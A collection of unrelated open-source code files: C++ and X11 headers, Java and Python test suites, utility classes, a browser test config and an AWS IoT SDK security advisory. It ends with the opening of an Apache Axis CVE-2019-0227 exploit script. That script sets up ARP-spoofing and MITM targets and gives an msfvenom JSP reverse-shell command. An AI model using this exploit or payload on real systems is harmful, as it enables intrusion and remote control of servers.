BRadioButton* fGmtTime;
int32 fLastUpdateMinute;
bool fUseGmtTime;
bool fOldUseGmtTime;
TimeZoneListItem* fCurrentZoneItem;
TimeZoneListItem* fOldZoneItem;
bool fInitialized;
BTimeFormat fTimeFormat;
};
#endif // ZONE_VIEW_H
| 677 |
395 | /**
* Copyright 2017-2019 The OpenTracing Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package io.opentracing.contrib.spring.cloud.async.instrument;
import static org.awaitility.Awaitility.await;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import io.opentracing.Scope;
import io.opentracing.Span;
import io.opentracing.contrib.spring.cloud.MockTracingConfiguration;
import io.opentracing.contrib.spring.cloud.TestUtils;
import io.opentracing.mock.MockSpan;
import io.opentracing.mock.MockTracer;
import java.time.Instant;
import java.util.List;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.Executor;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.RejectedExecutionException;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.task.SimpleAsyncTaskExecutor;
import org.springframework.scheduling.concurrent.ThreadPoolTaskExecutor;
import org.springframework.scheduling.concurrent.ThreadPoolTaskScheduler;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
/**
* @author cbono
*/
@SpringBootTest(classes = {
MockTracingConfiguration.class,
TracedThreadPoolTaskSchedulerIntegrationTest.TestConfiguration.class
})
@RunWith(SpringJUnit4ClassRunner.class)
public class TracedThreadPoolTaskSchedulerIntegrationTest {
@Configuration
static class TestConfiguration {
@Bean
public ThreadPoolTaskScheduler threadPoolTaskScheduler() {
final ThreadPoolTaskScheduler executor = new ThreadPoolTaskScheduler();
executor.initialize();
return executor;
}
}
@Autowired
private MockTracer mockTracer;
@Autowired
@Qualifier("threadPoolTaskScheduler")
private ThreadPoolTaskScheduler threadPoolTaskScheduler;
@Before
public void before() {
mockTracer.reset();
}
@Test
public void testExecute() {
final Span span = mockTracer.buildSpan("5150").start();
try (Scope scope = mockTracer.activateSpan(span)) {
final CompletableFuture<String> completableFuture = CompletableFuture.supplyAsync(() -> {
mockTracer.buildSpan("child").start().finish();
return "ok";
}, threadPoolTaskScheduler);
completableFuture.join();
}
span.finish();
await().until(() -> mockTracer.finishedSpans().size() == 2);
final List<MockSpan> mockSpans = mockTracer.finishedSpans();
assertEquals(2, mockSpans.size());
TestUtils.assertSameTraceId(mockSpans);
}
@Test
public void testSumbit() throws Exception {
final Span span = mockTracer.buildSpan("5150").start();
try (Scope scope = mockTracer.activateSpan(span)) {
final Future<?> child = threadPoolTaskScheduler.submit(() -> mockTracer.buildSpan("child").start().finish());
child.get();
}
span.finish();
await().until(() -> mockTracer.finishedSpans().size() == 2);
final List<MockSpan> mockSpans = mockTracer.finishedSpans();
assertEquals(2, mockSpans.size());
TestUtils.assertSameTraceId(mockSpans);
}
@Test
public void testSchedule() throws Exception {
final Span span = mockTracer.buildSpan("5150").start();
try (Scope scope = mockTracer.activateSpan(span)) {
final Future<?> child = threadPoolTaskScheduler.schedule(
() -> mockTracer.buildSpan("child").start().finish(),
Instant.now().plusSeconds(5));
child.get();
}
span.finish();
await().until(() -> mockTracer.finishedSpans().size() == 2);
final List<MockSpan> mockSpans = mockTracer.finishedSpans();
assertEquals(2, mockSpans.size());
TestUtils.assertSameTraceId(mockSpans);
}
}
| 1,536 |
2,338 | import lldb
from intelpt_testcase import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
from lldbsuite.test.decorators import *
class TestTraceLoad(TraceIntelPTTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
def testSchema(self):
self.expect("trace schema intel-pt", substrs=["trace", "triple", "threads", "traceFile"])
def testInvalidPluginSchema(self):
self.expect("trace schema invalid-plugin", error=True,
substrs=['error: no trace plug-in matches the specified type: "invalid-plugin"'])
def testAllSchemas(self):
self.expect("trace schema all", substrs=['''{
"trace": {
"type": "intel-pt",
"cpuInfo": {
"vendor": "intel" | "unknown",
"family": integer,
"model": integer,
"stepping": integer
}
},'''])
| 336 |
862 | <filename>lock-api-objects/src/main/java/com/palantir/lock/LockGroupBehavior.java
/*
* (c) Copyright 2018 Palantir Technologies Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.palantir.lock;
/**
* Defines the behavior that the lock server takes when some of the requested locks
* cannot be acquired.
*
* @author jtamer
*/
public enum LockGroupBehavior {
/**
* Instructs the lock server to acquire as many of the requested locks as
* possible.
*/
LOCK_AS_MANY_AS_POSSIBLE,
/**
* Instructs the lock server to not acquire any of the locks unless they can
* all be acquired. This is the default behavior.
*/
LOCK_ALL_OR_NONE;
}
| 369 |
6,272 | <reponame>DuncanFaulkner/flex-layout
{
"ChromeHeadlessLocal": {
"base": "ChromeHeadless",
"flags": ["--window-size=1024,768"]
},
"ChromeHeadlessCI": {
"base": "ChromeHeadless",
"flags": ["--window-size=1024,768", "--no-sandbox"]
},
"FirefoxHeadless": {
"base": "Firefox",
"flags": ["-headless"]
},
"SAUCELABS_IOS14": {
"base": "SauceLabs",
"appiumVersion": "1.20.1",
"deviceOrientation": "portrait",
"browserName": "Safari",
"platformVersion": "14.3",
"platformName": "iOS",
"deviceName": "iPhone 12 Pro Simulator"
},
"BROWSERSTACK_SAFARI13": {
"base": "BrowserStack",
"browser": "Safari",
"browser_version": "13.1",
"os": "OS X",
"os_version": "Catalina"
}
}
| 339 |
521 | <filename>third_party/virtualbox/src/VBox/Additions/x11/x11include/XFree86-4.3/X11/extensions/shapestr.h<gh_stars>100-1000
/************************************************************
Copyright 1989, 1998 The Open Group
Permission to use, copy, modify, distribute, and sell this software and its
documentation for any purpose is hereby granted without fee, provided that
the above copyright notice appear in all copies and that both that
copyright notice and this permission notice appear in supporting
documentation.
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
OPEN GROUP BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Except as contained in this notice, the name of The Open Group shall not be
used in advertising or otherwise to promote the sale, use or other dealings
in this Software without prior written authorization from The Open Group.
********************************************************/
/* $Xorg: shapestr.h,v 1.4 2001/02/09 02:03:24 xorgcvs Exp $ */
#ifndef _SHAPESTR_H_
#define _SHAPESTR_H_
/*
* Protocol requests constants and alignment values
* These would really be in SHAPE's X.h and Xproto.h equivalents
*/
#include "shape.h"
#define Window CARD32
#define Time CARD32
#define SHAPENAME "SHAPE"
#define SHAPE_MAJOR_VERSION 1 /* current version numbers */
#define SHAPE_MINOR_VERSION 0
typedef struct _ShapeQueryVersion {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeQueryVersion */
CARD16 length B16;
} xShapeQueryVersionReq;
#define sz_xShapeQueryVersionReq 4
typedef struct {
BYTE type; /* X_Reply */
CARD8 unused; /* not used */
CARD16 sequenceNumber B16;
CARD32 length B32;
CARD16 majorVersion B16; /* major version of SHAPE protocol */
CARD16 minorVersion B16; /* minor version of SHAPE protocol */
CARD32 pad0 B32;
CARD32 pad1 B32;
CARD32 pad2 B32;
CARD32 pad3 B32;
CARD32 pad4 B32;
} xShapeQueryVersionReply;
#define sz_xShapeQueryVersionReply 32
typedef struct _ShapeRectangles {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeRectangles */
CARD16 length B16;
CARD8 op; /* Set, ... */
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD8 ordering; /* UnSorted, YSorted, YXSorted, YXBanded */
CARD8 pad0; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
} xShapeRectanglesReq; /* followed by xRects */
#define sz_xShapeRectanglesReq 16
typedef struct _ShapeMask {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeMask */
CARD16 length B16;
CARD8 op; /* Set, ... */
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD16 junk B16; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
CARD32 src B32; /* 1 bit pixmap */
} xShapeMaskReq;
#define sz_xShapeMaskReq 20
typedef struct _ShapeCombine {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeCombine */
CARD16 length B16;
CARD8 op; /* Set, ... */
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD8 srcKind; /* ShapeBounding or ShapeClip */
CARD8 junk; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
Window src B32;
} xShapeCombineReq;
#define sz_xShapeCombineReq 20
typedef struct _ShapeOffset {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeOffset */
CARD16 length B16;
CARD8 destKind; /* ShapeBounding or ShapeClip */
CARD8 junk1; /* not used */
CARD16 junk2 B16; /* not used */
Window dest B32;
INT16 xOff B16;
INT16 yOff B16;
} xShapeOffsetReq;
#define sz_xShapeOffsetReq 16
typedef struct _ShapeQueryExtents {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeQueryExtents */
CARD16 length B16;
Window window B32;
} xShapeQueryExtentsReq;
#define sz_xShapeQueryExtentsReq 8
typedef struct {
BYTE type; /* X_Reply */
CARD8 unused; /* not used */
CARD16 sequenceNumber B16;
CARD32 length B32; /* 0 */
CARD8 boundingShaped; /* window has bounding shape */
CARD8 clipShaped; /* window has clip shape */
CARD16 unused1 B16;
INT16 xBoundingShape B16; /* extents of bounding shape */
INT16 yBoundingShape B16;
CARD16 widthBoundingShape B16;
CARD16 heightBoundingShape B16;
INT16 xClipShape B16; /* extents of clip shape */
INT16 yClipShape B16;
CARD16 widthClipShape B16;
CARD16 heightClipShape B16;
CARD32 pad1 B32;
} xShapeQueryExtentsReply;
#define sz_xShapeQueryExtentsReply 32
typedef struct _ShapeSelectInput {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeSelectInput */
CARD16 length B16;
Window window B32;
BYTE enable; /* xTrue -> send events */
BYTE pad1;
CARD16 pad2 B16;
} xShapeSelectInputReq;
#define sz_xShapeSelectInputReq 12
typedef struct _ShapeNotify {
BYTE type; /* always eventBase + ShapeNotify */
BYTE kind; /* either ShapeBounding or ShapeClip */
CARD16 sequenceNumber B16;
Window window B32;
INT16 x B16;
INT16 y B16; /* extents of new shape */
CARD16 width B16;
CARD16 height B16;
Time time B32; /* time of change */
BYTE shaped; /* set when a shape actual exists */
BYTE pad0;
CARD16 pad1 B16;
CARD32 pad2 B32;
CARD32 pad3 B32;
} xShapeNotifyEvent;
#define sz_xShapeNotifyEvent 32
typedef struct _ShapeInputSelected {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeInputSelected */
CARD16 length B16;
Window window B32;
} xShapeInputSelectedReq;
#define sz_xShapeInputSelectedReq 8
typedef struct {
BYTE type; /* X_Reply */
CARD8 enabled; /* current status */
CARD16 sequenceNumber B16;
CARD32 length B32; /* 0 */
CARD32 pad1 B32; /* unused */
CARD32 pad2 B32;
CARD32 pad3 B32;
CARD32 pad4 B32;
CARD32 pad5 B32;
CARD32 pad6 B32;
} xShapeInputSelectedReply;
#define sz_xShapeInputSelectedReply 32
typedef struct _ShapeGetRectangles {
CARD8 reqType; /* always ShapeReqCode */
CARD8 shapeReqType; /* always X_ShapeGetRectangles */
CARD16 length B16;
Window window B32;
CARD8 kind; /* ShapeBounding or ShapeClip */
CARD8 junk1;
CARD16 junk2 B16;
} xShapeGetRectanglesReq;
#define sz_xShapeGetRectanglesReq 12
typedef struct {
BYTE type; /* X_Reply */
CARD8 ordering; /* UnSorted, YSorted, YXSorted, YXBanded */
CARD16 sequenceNumber B16;
CARD32 length B32; /* not zero */
CARD32 nrects B32; /* number of rectangles */
CARD32 pad1 B32;
CARD32 pad2 B32;
CARD32 pad3 B32;
CARD32 pad4 B32;
CARD32 pad5 B32;
} xShapeGetRectanglesReply; /* followed by xRectangles */
#define sz_xShapeGetRectanglesReply 32
#undef Window
#undef Time
#endif /* _SHAPESTR_H_ */
| 2,751 |
775 | <reponame>ntyukaev/training_extensions<gh_stars>100-1000
# Copyright (C) 2021-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""
This module contains the different ui rules elements, Rule and UIRules. They are used to define rules for disabling
configuration parameters in the ui, conditional on the value of other parameters.
"""
from __future__ import annotations
from typing import Callable, List, Optional, Union
from attr import asdict, attrib, attrs, setters
from ote_sdk.configuration.elements.utils import attr_enum_to_str_serializer
from ote_sdk.configuration.enums.config_element_type import ConfigElementType
from .types import Action, Operator
from .utils import attr_convert_action, attr_convert_operator
ALLOWED_RULE_VALUE_TYPES = Union[int, str, float, bool] # pylint: disable=invalid-name
@attrs(auto_attribs=True)
class Rule:
"""
This class represents a `operator` applied to the `value` of the configurable parameter `parameter`. The parameter
for which the rule should be evaluated is identified by name, or by a list of names representing the attribute path
to the parameter in case of a nested configuration
"""
parameter: Union[str, List[str]]
value: ALLOWED_RULE_VALUE_TYPES
operator: Operator = attrib(
default=Operator.EQUAL_TO, converter=attr_convert_operator
)
type: ConfigElementType = attrib(
default=ConfigElementType.RULE, on_setattr=setters.frozen
)
def to_dict(self, enum_to_str: bool = True) -> dict:
"""
Method to serialize a Rule instance to its dictionary representation.
:param enum_to_str: Set to True to convert Enum instances to their string representation
:return: dictionary representation of the Rule object for which this method is called
"""
if enum_to_str:
serializer: Optional[Callable] = attr_enum_to_str_serializer
else:
serializer = None
return asdict(self, value_serializer=serializer)
@attrs(auto_attribs=True)
class UIRules:
"""
This class allows the combination of ExposureRules using boolean logic. The class can be set as an attribute of a
configurable parameter. If the `rules` (combined according to the `operator`) evaluate to True, the corresponding
`action` will be taken in the UI.
If UIRules are nested, only the `action` of the outermost UIRule will be considered.
"""
rules: List[Union[Rule, UIRules]] = attrib(kw_only=True)
operator: Operator = attrib(default=Operator.AND, converter=attr_convert_operator)
action: Action = attrib(
default=Action.DISABLE_EDITING, converter=attr_convert_action
)
type: ConfigElementType = attrib(
default=ConfigElementType.UI_RULES, on_setattr=setters.frozen
)
def add_rule(self, rule: Union[Rule, UIRules]):
"""Adds rule."""
self.rules.append(rule)
def to_dict(self, enum_to_str: bool = True) -> dict:
"""
Method to serialize an UIRules instance to its dictionary representation. Applies recursion to convert
nested rules, if applicable.
:param enum_to_str: Set to True to convert Enum instances to their string representation
:return: dictionary representation of the UIRules object for which this method is called
"""
if enum_to_str:
serializer: Optional[Callable] = attr_enum_to_str_serializer
else:
serializer = None
rules_list = []
for rule in self.rules:
rules_list.append(rule.to_dict(enum_to_str))
dictionary_representation = asdict(self, value_serializer=serializer)
dictionary_representation.update({"rules": rules_list})
return dictionary_representation
@attrs
class NullUIRules(UIRules):
"""
This class represents an empty, unset UIRules element.
"""
rules: List[Union[Rule, UIRules]] = attrib(factory=list)
| 1,394 |
3,631 | /*
* Copyright 2021 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.drools.verifier.core.checks;
import java.util.Comparator;
import java.util.Objects;
public class ComparableWrapper
implements Comparable<ComparableWrapper> {
public final static ComparableWrapper MIN_VALUE = new ComparableWrapper(null, Type.NEGATIVE_INFINITE);
public final static ComparableWrapper MAX_VALUE = new ComparableWrapper(null, Type.INFINITE);
enum Type {
NEGATIVE_INFINITE,
NORMAL,
INFINITE
}
private final Comparable value;
private final Type type;
public ComparableWrapper(final Comparable value) {
this(value, Type.NORMAL);
}
private ComparableWrapper(final Comparable value,
final Type type) {
this.value = value;
this.type = type;
}
@Override
public int compareTo(final ComparableWrapper other) {
if (!Objects.equals(type, Type.NORMAL) || !Objects.equals(other.type, Type.NORMAL)) {
return type.compareTo(other.type);
} else {
Comparator<Comparable> nullFirstCompare = Comparator.nullsFirst(Comparable::compareTo);
return nullFirstCompare.compare(value, other.value);
}
}
public Comparable getValue() {
return value;
}
} | 674 |
567 | package com.google.cloud.bigquery.utils.queryfixer.util;
import com.google.cloud.bigquery.utils.queryfixer.entity.Position;
import com.google.cloud.bigquery.utils.queryfixer.entity.StringView;
import lombok.AllArgsConstructor;
import lombok.NonNull;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
* A helper class that provides static methods to extract substrings from a string based on regular
* expression.
*/
@AllArgsConstructor
public class PatternMatcher {
private static final String POSITION_REGEX = "\\[(.*?):(.*?)\\]";
/**
* Check if a string matches a regular expression
*
* @param source the string to match
* @param regex regular expression
* @return true if it is matched else false.
*/
public static boolean isMatched(@NonNull String source, @NonNull String regex) {
Pattern pattern = Pattern.compile(regex);
Matcher matcher = pattern.matcher(source);
return matcher.find();
}
/**
* Extract substrings from a string based on regular expression. Only the grouped items will be
* extracted. A group item is enclosed by a pair of parentheses `()`. The sequence of the
* extracted substrings are determined by the position of their left parenthesis. For more
* details, please read {@link Pattern}. If a pattern is not matched in the input string, a null
* pointer will be returned.
*
* @param source the string to match
* @param regex regular expression
* @return a list of extracted substrings or null pointer.
*/
public static List<String> extract(@NonNull String source, @NonNull String regex) {
Pattern pattern = Pattern.compile(regex);
Matcher matcher = pattern.matcher(source);
if (!matcher.find()) {
return null;
}
List<String> contents = new ArrayList<>();
for (int i = 1; i <= matcher.groupCount(); i++) {
contents.add(matcher.group(i));
}
return contents;
}
/**
* Find all the substrings that matches a regex in a string.
*
* @param source string to be matched.
* @param regex regex to match substring
* @return A list of {@link StringView}
*/
public static List<StringView> findAllSubstrings(
@NonNull String source, @NonNull String regex) {
Pattern pattern = Pattern.compile(regex);
Matcher matcher = pattern.matcher(source);
List<StringView> stringViews = new ArrayList<>();
while (matcher.find()) {
stringViews.add(StringView.of(source, matcher.start(), matcher.end()));
}
return stringViews;
}
/**
* Extract the position information from a string like [x:y], where x and y are row and column
* numbers.
*
* @param posStr a string like [x:y]
* @return Position represented by the string
*/
public static Position extractPosition(String posStr) {
List<String> contents = PatternMatcher.extract(posStr, POSITION_REGEX);
if (contents == null) {
return null;
}
int rowNum = Integer.parseInt(contents.get(0));
int colNum = Integer.parseInt(contents.get(1));
return new Position(rowNum, colNum);
}
}
| 1,011 |
995 | <gh_stars>100-1000
#include "ExponentialBackoffTimer.hpp"
using namespace HomieInternals;
ExponentialBackoffTimer::ExponentialBackoffTimer(uint16_t initialInterval, uint8_t maxBackoff)
: _timer(Timer())
, _initialInterval(initialInterval)
, _maxBackoff(maxBackoff)
, _retryCount(0) {
_timer.deactivate();
}
bool ExponentialBackoffTimer::check() {
if (_timer.check()) {
if (_retryCount != _maxBackoff) _retryCount++;
uint32_t fixedDelay = pow(_retryCount, 2) * _initialInterval;
uint32_t randomDifference = random(0, (fixedDelay / 10) + 1);
uint32_t nextInterval = fixedDelay - randomDifference;
_timer.setInterval(nextInterval, false);
return true;
} else {
return false;
}
}
void ExponentialBackoffTimer::activate() {
if (_timer.isActive()) return;
_timer.setInterval(_initialInterval, false);
_timer.activate();
_retryCount = 1;
}
void ExponentialBackoffTimer::deactivate() {
_timer.deactivate();
}
bool ExponentialBackoffTimer::isActive() const {
return _timer.isActive();
}
| 368 |
6,304 | <filename>experimental/sktext/src/VisualRun.cpp
// Copyright 2021 Google LLC.
#include "experimental/sktext/src/VisualRun.h"
namespace skia {
namespace text {
} // namespace text
} // namespace skia
| 65 |
329 | from collections.abc import Callable
import pytest
from rest_framework import renderers
from rest_framework import request as rest_request
from rest_framework import serializers
from rest_framework.compat import uritemplate
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.serializers import Serializer
from rest_framework.test import APIRequestFactory
from rest_registration.api import views
from rest_registration.decorators import api_view_serializer_class_getter
from tests.helpers.api_views import rest_framework_version_info # noqa: F401
class ExampleSerializer(Serializer): # pylint: disable=abstract-method
test_field = serializers.CharField()
@pytest.fixture()
def decorator():
return api_view_serializer_class_getter(lambda: ExampleSerializer)
@pytest.fixture()
def input_post_view():
return (api_view(['POST']))(dummy_view_func)
@pytest.fixture()
def input_put_view():
return (api_view(['PUT']))(dummy_view_func)
def test_success(input_post_view, decorator):
output_view = decorator(input_post_view)
assert isinstance(output_view, Callable)
wrapper_cls = _get_view_class(output_view)
assert wrapper_cls.get_serializer_class() == ExampleSerializer
assert isinstance(wrapper_cls.get_serializer(), ExampleSerializer)
@pytest.mark.skipif(
'rest_framework_version_info < (3, 10, 0)'
' or rest_framework_version_info >= (3, 12, 0)')
def test_default_schema_success(input_post_view, decorator):
output_view = decorator(input_post_view)
wrapper_cls = _get_view_class(output_view)
schema = wrapper_cls().schema
operation = schema.get_operation('/api/dummy-view/', 'POST')
operation_schema = operation['requestBody']['content']['application/json']['schema']
expected_operation_schema = {
'properties': {
'test_field': {'type': 'string'},
},
'required': ['test_field'],
}
assert operation_schema == expected_operation_schema
@pytest.mark.skipif('rest_framework_version_info < (3, 10, 0)')
def test_coreapi_autoschema_success(
settings_with_coreapi_autoschema, input_post_view, decorator):
output_view = decorator(input_post_view)
wrapper_cls = _get_view_class(output_view)
schema = wrapper_cls().schema
# Ensure that get_link works properly with coreapi AutoSchema
assert uritemplate is not None
link = schema.get_link('/api/dummy-view/', 'POST', None)
assert len(link.fields) == 1
assert link.fields[0].name == 'test_field'
assert link.fields[0].required
@pytest.mark.skipif('rest_framework_version_info >= (3, 10, 0)')
def test_default_schema_success_deprecated(input_post_view, decorator):
output_view = decorator(input_post_view)
wrapper_cls = _get_view_class(output_view)
schema = wrapper_cls().schema
# Ensure that get_link works properly with coreapi AutoSchema
assert uritemplate is not None
link = schema.get_link('/api/dummy-view/', 'POST', None)
assert len(link.fields) == 1
assert link.fields[0].name == 'test_field'
assert link.fields[0].required
def test_not_a_view(decorator):
with pytest.raises(Exception):
decorator(dummy_view_func)
def test_browsable_renderer_put_render(input_put_view, decorator):
"""
Test, that PUT method works with BrowsableAPIRenderer
This was not working in the past, because of `_get_serializer`
didn't allow `instance parameter.
"""
data = {'blah': 'blah'}
method = 'PUT'
request = rest_request.Request(APIRequestFactory().get('blah'))
output_view = decorator(input_put_view)
wrapper_cls = _get_view_class(output_view)
test_view_instance = wrapper_cls()
renderer = renderers.BrowsableAPIRenderer()
renderer.accepted_media_type = None
renderer.renderer_context = {}
response = renderer.get_raw_data_form(
data, test_view_instance, method, request,
)
assert response.data == {}
def test_views_serializer_getter_returns_correct_value():
view_list = [
v for k, v in vars(views).items() if not k.startswith('_')]
for view in view_list:
serializer = view.cls.get_serializer()
assert isinstance(serializer, Serializer)
def dummy_view_func(request):
return Response()
def _get_view_class(view):
return view.cls
| 1,583 |
348 | <reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Taillecourt","circ":"4ème circonscription","dpt":"Doubs","inscrits":826,"abs":428,"votants":398,"blancs":21,"nuls":12,"exp":365,"res":[{"nuance":"REM","nom":"<NAME>","voix":211},{"nuance":"FN","nom":"<NAME>","voix":154}]} | 109 |
404 | <gh_stars>100-1000
//
// AppDelegate.h
// TFEasyCoderDemo
//
// Created by ztf on 16/10/28.
// Copyright © 2016年 ztf. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface AppDelegate : UIResponder <UIApplicationDelegate>
@property (strong, nonatomic) UIWindow *window;
@end
| 114 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-c4rh-4376-gff4",
"modified": "2021-12-03T15:22:02Z",
"published": "2021-11-24T21:12:04Z",
"aliases": [
"CVE-2021-40830"
],
"summary": "Improper certificate management in AWS IoT Device SDK v2",
"details": "The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.0"
}
]
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "aws-iot-device-sdk-v2"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
]
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "awsiotsdk"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.1"
}
]
}
]
}
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40830"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-cpp-v2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-java-v2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-js-v2"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-iot-device-sdk-python-v2"
},
{
"type": "WEB",
"url": "https://github.com/awslabs/aws-c-io/"
}
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"severity": "MODERATE",
"github_reviewed": true
}
} | 1,967 |
489 | <gh_stars>100-1000
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# Apache Axis 1.4 Remote Code Execution CVE-2019-0227 #
#https://rhinosecuritylabs.com/Application-Security/CVE-2019-0227-Expired-Domain-to-RCE-in-Apache-Axis #
# Author: <NAME> @daveysec, Rhino Security Labs #
# This exploits Apache Axis < 1.4 to upload and execute a JSP payload using MITM #
# by forcing an http request using the default StockQuoteService.jws service. #
# You need to be on the same network as the Axis server to make this work. #
# A lot of this exploit is based on the research from: #
# https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce #
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
import SimpleHTTPServer
import SocketServer
import subprocess
from time import sleep
import thread
import requests
from urllib import quote_plus
import sys
#Usage: python CVE-2019-0227.py shell.jsp
#You need to change these variable to match your configuration
myip = "192.168.0.117" #IP of your machine
target = "192.168.0.102" #IP of target
gateway = "192.168.0.1" #default gateway
targetport = "8080" #Port of target running axis (probably 8080)
pathtoaxis = "http://192.168.0.102:8080/axis" #This can be custom depending on the Axis install, but this is default
spoofinterface = "eth0" #Interface for arpspoofing
jspwritepath = "webapps\\axis\\exploit.jsp" #relative path on the target to write the JSP payload This is the default on a Tomcat install
#msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
